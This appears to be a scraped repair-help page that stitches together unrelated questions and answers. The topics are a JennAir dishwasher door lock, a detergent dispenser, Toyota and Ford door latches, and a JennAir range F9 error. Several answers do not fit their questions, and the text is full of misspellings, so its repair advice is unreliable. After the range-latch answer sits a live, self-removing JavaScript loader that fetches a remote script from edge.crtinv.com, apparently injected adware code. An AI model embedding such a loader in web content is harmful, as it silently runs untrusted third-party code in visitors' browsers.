I have a JennAir JDB2100AWS that the door lock does not disengage. You have to close the door very hard to get it to lock. But once you turn it on, it will not turn off, so if you open it, it still runs. It will stop running once it goes through a cycle. The "clean" light stays on all the time now. Do I need to replace the door lock or is this just an adjustment, I can't tell if it's broken by looking at it. I do have a habit of opening the dishwasher to throw last minute items in ... this issue occurred after I did that one time.

SOURCE: Cleaning agent not being released as compartment door not opening

For verifining the exect reson for your problem, you can start with a very simple test- Place the dish soap on the bottom of the dishwasher and run it for a full cycle. In case dishes will not become claen, your problem is with the water temp. If dishes will become clean properly, the problem is with the detergent door that doesn't opened at time (operated by a wax motor that get its power from the timer).Maybe that by cleaning the detergent cup you will solve the problem. In case it will not -To gain access to the wax motor you should open door assembly-Find the wax motor (close to the detergent dispenser cup)and test with a multi-meter if it get power(following cycle's sequence). If it get power, you should replace the wax motor. If it doesn't get power the problem is with the timer. Good luck !!

SOURCE: Dishwasher will not run

I am the guy from Key West with the Jenn Air....the solution for me was to give up finally and Home Depot provided a new dishwasher.........it works fine. I DID put a voltage surge protector on it which you can get at Home Depot for less than ten dollars as I recall...even called the surge protect company and was told it would work fine, just don't get it wet. (they have a warning NOT to use with water items like fish tanks, etc.)....was told it would be fine in this instance. Good luck to all with this problem!

SOURCE: Soap does not desolve

check that the spray arms are turning and that the holes in them are not clogged, if you line them up pointing towards the front let the machine fill then as it starts to wash open the door and you should see the arms slowing down, if they are okay then check the water level which should just lap the filter at the bottom

The handle is broken. You may have to force the door open so you can work on replacing the handle.

Washer is not working?

Most likely solution: The door latch assembly. When the door closes, the internal latch electronics must "sense" that the door is closed, but sometimes doesn't. When it correctly senses a closed door, it "locks" the door (electronically) and the door can't be opened until the machine has been OFF for about 100 secs. If the door doesn't "lock" when closed, it's just not sensing that it's closed. Solution: Close the door a bit more forcefully. I've seen cases where the door would need to be closed pretty hard, 3-4 times before it "locked". Once it senses the door is closed, and locks, the machine operates normally. The latch assy can be replaced, but often develops the same problem, eventually. Slamming the door won't hurt it.

Toyota avalon 2000 front drivers side door closes but lock does not lock it to a solid shut....can still pull door open whats happening

Sounds like a badly adjusted door lock. Either the hasp on the door post is too far in, not allowing the lock to cycle to a complete lock position, or the lock is faulty. The hasp can be adjusted, so try that before looking at replacing the lock mechanism.
To check the door lock, open the door and manually turn the lock mechanism until you hear the lock click in place, then using a round object like a longish 8 mm bolt, hook it into the lock mechanism and pull real hard. It should be impossible to turn the mechanism by hand once it is locked.
It is also possible that the hasp (the bent piece of metal mounted on the door post) is too low. This will allow the lock mechanism to slip over it and not close properly.

Car door won't close

Did the door catch hit the seat belt buckle when you slammed the door? If so the door catch may have tripped like it was locking over the bar on the door post on the car. Just try pulling the door handle to disengage the catch.

Jennair jer8855 range was beeping , had f9 message, oven door locked and oven won't turn on. I turned circuit breaker on/ off as per a previous post which took away error message, unlocked oven do

The latch has most likely become dislocated from its mounting points and will need to be secured back in place correctly.. Check the mounting screws to see if they are loose. Then move the latch back into position and tighten them securely. If not then the error will just come back. The latch mechanism may also need replacing altogether itf it is damaged.!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState '' this.readyState=="loaded" '' this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();

2007 ford freestar lift gate will not open even though I can hear the lock disengaging. Still feels locked. It is manual open, but cannot lift it, feels locked.

Try pressing the door closed while unlocking and releasing. If the door previously has been slammed shut hard or just due to general wear and tear the latching mechanism can become slightly relocated. This means that when the door closes the door is pressing tighter than normal against the door seal. The compressed door seal will put a lot of strain on the latch mechanism and can hinder its retraction when released. By pressing the door closed and therefore removing the strain due to the door seal you might allow the release mechanism enough freedom of movement to retract when released. If having got the door open then immediately adjust/relocate and lubricate the lock/release mechanism such that you achieve a happy medium of the door closing with a weatherproof seal but not so tightly as to put the latch under a lot of strain.
